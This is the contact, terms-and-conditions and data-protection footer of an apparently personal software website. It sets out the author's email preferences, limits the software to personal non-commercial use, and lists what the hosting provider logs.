If you miss anything here, have additions, comments, corrections, criticism or questions, want to give feedback, hints or tipps, report broken links, bugs, deficiencies, errors, inaccuracies, misrepresentations, omissions, shortcomings, vulnerabilities or weaknesses, …: don’t hesitate to contact me and feel free to ask, comment, criticise, flame, notify or report!

Use the X.509 certificate to send S/MIME encrypted mail.

Note: email in weird format and without a proper sender name is likely to be discarded!

I dislike HTML (and even weirder formats too) in email, I prefer to receive plain text.
I also expect to see your full (real) name as sender, not your nickname.
I abhor top posts and expect inline quotes in replies.

Terms and Conditions

By using this site, you signify your agreement to these terms and conditions. If you do not agree to these terms and conditions, do not use this site!

The software and the documentation on this site are provided as is without any warranty, neither express nor implied.
In no event will the author be held liable for any damage(s) arising from the use of the software or the documentation.
Permission is granted to use the current version of the software and the current version of the documentation solely for personal private and non-commercial purposes.
An individuals use of the software or the documentation in his or her capacity or function as an agent, (independent) contractor, employee, member or officer of a business, corporation or organisation (commercial or non-commercial) does not qualify as personal private and non-commercial purpose.
Without written approval from the author the software or the documentation must not be used for a business, for commercial, corporate, governmental, military or organisational purposes of any kind, or in a commercial, corporate, governmental, military or organisational environment of any kind.
Redistribution of the software and the documentation is allowed only in unmodified form of its current version and free of charge.

Data Protection Declaration

This web page records no (personal) data and stores no cookies in the web browser.

The web service is operated and provided by

Telekom Deutschland GmbH
Business Center
D-64306 Darmstadt
Germany
<‍hosting‍@‍telekom‍.‍de‍>
+49 800 5252033

The web service provider stores a session cookie in the web browser and records every visit of this web site with the following data in an access log on their server(s):

the (pseudonymised) IP address;
the date and time of the request;
the URL of the requested web page or file;
the Referer and User-Agent HTTP headers sent by the web browser;
the result (success or failure) of the request;
the amount of data received and sent.